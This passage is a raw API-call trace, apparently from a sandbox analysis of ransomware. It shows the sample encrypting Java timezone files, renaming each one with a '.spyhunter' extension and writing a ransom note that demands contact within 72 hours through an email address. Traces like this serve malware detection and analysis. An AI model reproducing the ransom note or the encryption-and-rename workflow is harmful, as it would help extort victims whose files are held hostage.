"c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.451] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT") returned 59 [0167.451] StrStrW (lpFirst="EST5EDT", lpSrch=".txt") returned 0x0 [0167.452] GetProcessHeap () returned 0x2c0000 [0167.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.452] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce554*=0x8f0, lpOverlapped=0x0) returned 1 [0167.555] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.555] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce554*=0x8f0, lpOverlapped=0x0) returned 1 [0167.556] GetProcessHeap () returned 0x2c0000 [0167.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.556] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x25ce594*, lpNumberOfBytesWritten=0x25ce554*=0x4, lpOverlapped=0x0) returned 1 [0167.556] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce554*=0x30, lpOverlapped=0x0) returned 1 [0167.556] CloseHandle (hObject=0xb0) returned 1 [0167.556] GetProcessHeap () returned 0x2c0000 [0167.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0167.556] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.spyhunter") returned 69 [0167.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt.spyhunter")) returned 1 [0167.557] GetProcessHeap () returned 0x2c0000 [0167.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0167.557] GetProcessHeap () returned 0x2c0000 [0167.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.557] GetProcessHeap () returned 0x2c0000 [0167.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7df8 | out: hHeap=0x2c0000) returned 1 [0167.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce598 | out: pbBuffer=0x25ce598) returned 1 [0167.558] GetProcessHeap () returned 0x2c0000 [0167.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.558] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce590*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce590*=0x30) returned 1 [0167.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.832] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue") returned 56 [0167.832] StrStrW (lpFirst="Niue", lpSrch=".txt") returned 0x0 [0167.832] GetProcessHeap () returned 0x2c0000 [0167.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.832] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce554*=0x59, lpOverlapped=0x0) returned 1 [0167.833] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.833] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce554*=0x59, lpOverlapped=0x0) returned 1 [0167.833] GetProcessHeap () returned 0x2c0000 [0167.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.833] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.833] WriteFile (in: hFile=0x178, lpBuffer=0x25ce594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x25ce594*, lpNumberOfBytesWritten=0x25ce554*=0x4, lpOverlapped=0x0) returned 1 [0167.833] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce554, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce554*=0x30, lpOverlapped=0x0) returned 1 [0167.834] CloseHandle (hObject=0x178) returned 1 [0167.834] GetProcessHeap () returned 0x2c0000 [0167.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.834] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.spyhunter") returned 66 [0167.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue.spyhunter")) returned 1 [0167.836] GetProcessHeap () returned 0x2c0000 [0167.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.836] GetProcessHeap () returned 0x2c0000 [0167.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.836] GetProcessHeap () returned 0x2c0000 [0167.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3d00 | out: hHeap=0x2c0000) returned 1 [0167.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce590 | out: pbBuffer=0x25ce590) returned 1 [0167.836] GetProcessHeap () returned 0x2c0000 [0167.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce588*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce588*=0x30) returned 1 [0167.836] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.837] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia") returned 56 [0167.837] StrStrW (lpFirst="Apia", lpSrch=".txt") returned 0x0 [0167.837] GetProcessHeap () returned 0x2c0000 [0167.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.837] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce54c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce54c*=0x238, lpOverlapped=0x0) returned 1 [0167.838] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdc8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.838] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x238, lpNumberOfBytesWritten=0x25ce54c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce54c*=0x238, lpOverlapped=0x0) returned 1 [0167.839] GetProcessHeap () returned 0x2c0000 [0167.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.839] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.839] WriteFile (in: hFile=0x178, lpBuffer=0x25ce58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce54c, lpOverlapped=0x0 | out: lpBuffer=0x25ce58c*, lpNumberOfBytesWritten=0x25ce54c*=0x4, lpOverlapped=0x0) returned 1 [0167.839] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce54c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce54c*=0x30, lpOverlapped=0x0) returned 1 [0167.839] CloseHandle (hObject=0x178) returned 1 [0167.839] GetProcessHeap () returned 0x2c0000 [0167.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.839] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.spyhunter") returned 66 [0167.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia.spyhunter")) returned 1 [0167.842] GetProcessHeap () returned 0x2c0000 [0167.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.842] GetProcessHeap () returned 0x2c0000 [0167.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.842] GetProcessHeap () returned 0x2c0000 [0167.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3340 | out: hHeap=0x2c0000) returned 1 [0167.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.844] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.844] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4c3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce4c3*, lpNumberOfBytesWritten=0x25ce5ec*=0x127, lpOverlapped=0x0) returned 1 [0167.845] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.845] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce5ec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce5ec*=0x2ac, lpOverlapped=0x0) returned 1 [0167.845] CloseHandle (hObject=0x178) returned 1 [0167.845] GetProcessHeap () returned 0x2c0000 [0167.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05148 | out: hHeap=0x2c0000) returned 1 [0167.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce588 | out: pbBuffer=0x25ce588) returned 1 [0167.845] GetProcessHeap () returned 0x2c0000 [0167.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce580*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce580*=0x30) returned 1 [0167.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.846] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion") returned 58 [0167.846] StrStrW (lpFirst="Reunion", lpSrch=".txt") returned 0x0 [0167.846] GetProcessHeap () returned 0x2c0000 [0167.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.846] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce544*=0x41, lpOverlapped=0x0) returned 1 [0167.847] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.847] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce544*=0x41, lpOverlapped=0x0) returned 1 [0167.847] GetProcessHeap () returned 0x2c0000 [0167.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.847] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.847] WriteFile (in: hFile=0x178, lpBuffer=0x25ce584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x25ce584*, lpNumberOfBytesWritten=0x25ce544*=0x4, lpOverlapped=0x0) returned 1 [0167.848] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce544*=0x30, lpOverlapped=0x0) returned 1 [0167.848] CloseHandle (hObject=0x178) returned 1 [0167.848] GetProcessHeap () returned 0x2c0000 [0167.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.848] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.spyhunter") returned 68 [0167.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion.spyhunter")) returned 1 [0167.849] GetProcessHeap () returned 0x2c0000 [0167.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.849] GetProcessHeap () returned 0x2c0000 [0167.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.849] GetProcessHeap () returned 0x2c0000 [0167.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3280 | out: hHeap=0x2c0000) returned 1 [0167.849] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce588 | out: pbBuffer=0x25ce588) returned 1 [0167.849] GetProcessHeap () returned 0x2c0000 [0167.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.849] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce580*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce580*=0x30) returned 1 [0167.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.850] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte") returned 58 [0167.850] StrStrW (lpFirst="Mayotte", lpSrch=".txt") returned 0x0 [0167.850] GetProcessHeap () returned 0x2c0000 [0167.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.850] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce544*=0x41, lpOverlapped=0x0) returned 1 [0167.851] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.851] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce544*=0x41, lpOverlapped=0x0) returned 1 [0167.851] GetProcessHeap () returned 0x2c0000 [0167.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.851] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.852] WriteFile (in: hFile=0x178, lpBuffer=0x25ce584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x25ce584*, lpNumberOfBytesWritten=0x25ce544*=0x4, lpOverlapped=0x0) returned 1 [0167.852] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce544, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce544*=0x30, lpOverlapped=0x0) returned 1 [0167.852] CloseHandle (hObject=0x178) returned 1 [0167.852] GetProcessHeap () returned 0x2c0000 [0167.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.852] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.spyhunter") returned 68 [0167.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte.spyhunter")) returned 1 [0167.853] GetProcessHeap () returned 0x2c0000 [0167.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.853] GetProcessHeap () returned 0x2c0000 [0167.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.853] GetProcessHeap () returned 0x2c0000 [0167.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec31c0 | out: hHeap=0x2c0000) returned 1 [0167.853] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce580 | out: pbBuffer=0x25ce580) returned 1 [0167.853] GetProcessHeap () returned 0x2c0000 [0167.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.853] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce578*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce578*=0x30) returned 1 [0167.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius") returned 60 [0167.854] StrStrW (lpFirst="Mauritius", lpSrch=".txt") returned 0x0 [0167.854] GetProcessHeap () returned 0x2c0000 [0167.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.854] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce53c*=0x69, lpOverlapped=0x0) returned 1 [0167.855] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.855] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce53c*=0x69, lpOverlapped=0x0) returned 1 [0167.855] GetProcessHeap () returned 0x2c0000 [0167.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.855] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.856] WriteFile (in: hFile=0x178, lpBuffer=0x25ce57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x25ce57c*, lpNumberOfBytesWritten=0x25ce53c*=0x4, lpOverlapped=0x0) returned 1 [0167.856] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce53c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce53c*=0x30, lpOverlapped=0x0) returned 1 [0167.856] CloseHandle (hObject=0x178) returned 1 [0167.856] GetProcessHeap () returned 0x2c0000 [0167.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.856] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.spyhunter") returned 70 [0167.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius.spyhunter")) returned 1 [0167.857] GetProcessHeap () returned 0x2c0000 [0167.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.857] GetProcessHeap () returned 0x2c0000 [0167.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.857] GetProcessHeap () returned 0x2c0000 [0167.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4a60 | out: hHeap=0x2c0000) returned 1 [0167.857] CryptGenRandom (in: hProv=0x2d5df8, 